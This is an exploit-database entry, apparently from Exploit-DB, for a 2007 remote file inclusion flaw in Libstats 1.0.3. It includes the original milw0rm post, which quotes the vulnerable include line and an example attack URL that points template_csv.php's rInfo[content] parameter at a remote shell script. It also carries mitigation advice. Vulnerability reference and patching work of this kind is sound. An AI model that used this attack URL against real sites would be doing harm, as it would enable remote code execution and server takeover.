header-logo
Suggest Exploit
vendor:
Libstats
by:
milw0rm.com
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Libstats
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Libstats 1.0.3 <= Remote File Inclusion Vulnerability

The vulnerability exists in the 'template_csv.php' file of Libstats version 1.0.3 and earlier. It allows an attacker to include remote files by manipulating the 'rInfo[content]' parameter. An example exploit URL is provided.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Libstats or apply appropriate input validation to the 'rInfo[content]' parameter.
Source

Exploit-DB raw data:

#Libstats 1.0.3 <=  Remote File Inclusion Vulnerability
#
#Vuln Code
##############################################################################################
#
#ERROR1:template_csv.php
#
#include $rInfo['content'];   <<< RFI CODE
#
#
#BUG1:
#
#Example1:http://site.com/path/template_csv.php?rInfo[content]=[[Sh3LL Script]]
#
#Script Download
##############################################################################################
#
#http://www.wendt.wisc.edu/projects/systems/libstats/releases/libstats-1.0.3.zip
#
##############################################################################################
#
#Cyber-Security <> Cyber-warrior.org
#
##############################################################################################

# milw0rm.com [2007-05-18]